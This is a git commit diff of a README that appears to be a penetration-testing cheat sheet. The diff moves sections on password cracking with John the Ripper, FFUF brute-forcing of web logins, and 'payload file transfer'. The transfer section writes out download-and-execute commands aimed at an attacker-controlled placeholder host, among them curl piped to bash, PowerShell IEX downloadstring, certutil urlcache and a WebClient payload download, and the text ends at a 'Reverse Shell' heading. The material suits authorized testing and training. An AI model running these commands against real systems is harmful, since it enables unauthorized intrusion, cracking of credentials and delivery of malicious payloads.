Update README.md

2022-09-02 17:37:55 -04:00
parent 99ced621e7
commit 2bb313162c
1 changed files with 149 additions and 139 deletions
--- a/README.md
+++ b/README.md
@@ -567,6 +567,15 @@ upload {FILE.exe}
 ```
 <br />
 # Active Directory
 ***
 <br />
 https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/pentest_ad.png
 <br />
 # Buffer Overflow
@@ -633,148 +642,11 @@ python3 exploit.py
 <br />
 # Password Cracking
 ***
 ## John The Ripper
 <br />
 ```bash
 # About: A tool used to crack passwords, hashes, and zip files 
 # Download: Pre-installed on Kali Linux
 # Usage - Crack a zip file {FILE.zip} and output hash into text file {FILE.txt} 
 sudo zip2john {FILE.zip} > {FILE.txt}
 # Usage - Crack a rar file {FILE.rar} and output hash into text file {FILE.txt} 
 sudo rar2john {FILE.rar} > {FILE.txt}
 # Usage - Crack a password file {FILE.txt}
 john -w=/usr/share/wordlists/rockyou.txt {FILE.txt}
 # --format={HASH}: Specifiy a hash type to crack (see below)
 john --format=Raw-MD5 {FILE.txt}
 :' 
 descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS, 
 tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256, 
 aix-ssha512, andOTP, ansible, argon2, as400-des, as400-ssha1, asa-md5, 
 AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin, BitLocker, 
 bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain, chap, 
 Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe, sha1crypt, 
 sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django, 
 django-scrypt, dmd5, dmg, dominosec, dominosec8, DPAPImk, dragonfly3-32, 
 dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7, eCryptfs, eigrp, 
 electrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256, 
 Fortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa, 
 hMailServer, hsrp, IKE, ipb2, itunes-backup, iwork, KeePass, keychain, 
 keyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs, 
 krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS, 
 MD2, mdc2, MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash, 
 mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12, 
 multibit, mysqlna, mysql-sha1, mysql, net-ah, nethalflm, netlm, netlmv2, 
 net-md5, netntlmv2, netntlm, netntlm-naive, net-sha1, nk, notes, md5ns, 
 nsec3, NT, o10glogon, o3logon, o5logon, ODF, Office, oldoffice, 
 OpenBSD-SoftRAID, openssl-enc, oracle, oracle11, Oracle12C, osc, ospf, 
 Padlock, Palshop, Panama, PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1, 
 PBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda, 
 pgpwde, phpass, PHPS, PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY, 
 pwsafe, qnx, RACF, RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512, 
 Raw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1, 
 Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3, 
 Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7, 
 Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP, 
 skein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP, 
 solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE, 
 Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, tc_aes_xts, 
 tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi, OpenVMS, vmx, 
 VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk, wpapsk-pmk, 
 xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext, has-160, 
 HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512, 
 dummy, crypt
 '
 ```
 <br />
 ## FFUF
 <br />
 ```bash
 # FFUF
 # About: A tool used to brute force web credentials
 # Download: Pre-installed on Kali Linux
 # Usage - One variable FUZZ
 ffuf -c -request {FILE.req} -request-proto http -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -fr "{FILTER}"
 # EXAMPLE {FILE}
 username=admin$password=FUZZ
 ```
 <br />
 # Payload File Transfer
 ***
 ####  [STEP 1] Python Server on Client
 <br />
 ```bash
 # Python Server
 # About: A python command used to open a server on the client machine
 # Download: Pre-installed on Kali Linux
 # USAGE - Host on client machine
 sudo python3 -m http.server {PORT}
 # {PORT}: Port to open for file transfer
 ```
 <br />
 #### [STEP 2] Download Command on Server 
 <br />
 ```bash
 # WGET
 # About: A command used to download files on the current machine
 # Download: Pre-installed on Kali Linux
 # Usage - Download on server machine
 wget {IP ADDRESS}/{FILE} -outfile {FILE}
 curl {IP ADDRESS}/{FILE}
 # Linux - Download file and execute in bash:
 curl {IP ADDRESS}/{FILE.sh} | bash
 # Windows - Download file and execute in powershell:
 powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
 powershell -c 'Invoke-AllChecks'
 # Windows - Download file using certutil
 certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
 # Windows - Download file using powershell
 powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')"
 # {IP ADDRESS}: IP Address of the client from step one (python server)
 # {FILE}:       The payload to be transferred
 ```
 <br />
 # Privilege Escalation
 <br />
-## Windows - Winpeas
+## Windows 
 <br />
@@ -816,7 +688,7 @@ Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership <username> | selec
 ```
 <br />
-## Linux - Linpeas
+## Linux 
 <br />
@@ -881,6 +753,144 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null
 ```
 <br />
 # Password Cracking
 ***
 #### John The Ripper
 <br />
 ```bash
 # About: A tool used to crack passwords, hashes, and zip files 
 # Download: Pre-installed on Kali Linux
 # Usage - Crack a zip file {FILE.zip} and output hash into text file {FILE.txt} 
 sudo zip2john {FILE.zip} > {FILE.txt}
 # Usage - Crack a rar file {FILE.rar} and output hash into text file {FILE.txt} 
 sudo rar2john {FILE.rar} > {FILE.txt}
 # Usage - Crack a password file {FILE.txt}
 john -w=/usr/share/wordlists/rockyou.txt {FILE.txt}
 # --format={HASH}: Specifiy a hash type to crack (see below)
 john --format=Raw-MD5 {FILE.txt}
 :' 
 descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS, 
 tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256, 
 aix-ssha512, andOTP, ansible, argon2, as400-des, as400-ssha1, asa-md5, 
 AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin, BitLocker, 
 bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain, chap, 
 Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe, sha1crypt, 
 sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django, 
 django-scrypt, dmd5, dmg, dominosec, dominosec8, DPAPImk, dragonfly3-32, 
 dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7, eCryptfs, eigrp, 
 electrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256, 
 Fortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa, 
 hMailServer, hsrp, IKE, ipb2, itunes-backup, iwork, KeePass, keychain, 
 keyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs, 
 krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS, 
 MD2, mdc2, MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash, 
 mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12, 
 multibit, mysqlna, mysql-sha1, mysql, net-ah, nethalflm, netlm, netlmv2, 
 net-md5, netntlmv2, netntlm, netntlm-naive, net-sha1, nk, notes, md5ns, 
 nsec3, NT, o10glogon, o3logon, o5logon, ODF, Office, oldoffice, 
 OpenBSD-SoftRAID, openssl-enc, oracle, oracle11, Oracle12C, osc, ospf, 
 Padlock, Palshop, Panama, PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1, 
 PBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda, 
 pgpwde, phpass, PHPS, PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY, 
 pwsafe, qnx, RACF, RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512, 
 Raw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1, 
 Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3, 
 Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7, 
 Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP, 
 skein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP, 
 solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE, 
 Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, tc_aes_xts, 
 tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi, OpenVMS, vmx, 
 VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk, wpapsk-pmk, 
 xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext, has-160, 
 HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512, 
 dummy, crypt
 '
 ```
 <br />
 ### FFUF
 <br />
 ```bash
 # FFUF
 # About: A tool used to brute force web credentials
 # Download: Pre-installed on Kali Linux
 # Usage - One variable FUZZ
 ffuf -c -request {FILE.req} -request-proto http -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -fr "{FILTER}"
 # EXAMPLE {FILE}
 username=admin$password=FUZZ
 ```
 <br />
 # Payload File Transfer
 ***
 ####  [STEP 1] Python Server on Client
 <br />
 ```bash
 # Python Server
 # About: A python command used to open a server on the client machine
 # Download: Pre-installed on Kali Linux
 # USAGE - Host on client machine
 sudo python3 -m http.server {PORT}
 # {PORT}: Port to open for file transfer
 ```
 <br />
 #### [STEP 2] Download Command on Server 
 <br />
 ```bash
 # WGET
 # About: A command used to download files on the current machine
 # Download: Pre-installed on Kali Linux
 # Usage - Download on server machine
 wget {IP ADDRESS}/{FILE} -outfile {FILE}
 curl {IP ADDRESS}/{FILE}
 # Linux - Download file and execute in bash:
 curl {IP ADDRESS}/{FILE.sh} | bash
 # Windows - Download file and execute in powershell:
 powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
 powershell -c 'Invoke-AllChecks'
 # Windows - Download file using certutil
 certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
 # Windows - Download file using powershell
 powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')"
 # {IP ADDRESS}: IP Address of the client from step one (python server)
 # {FILE}:       The payload to be transferred
 ```
 <br />
 # Reverse Shell
 <br />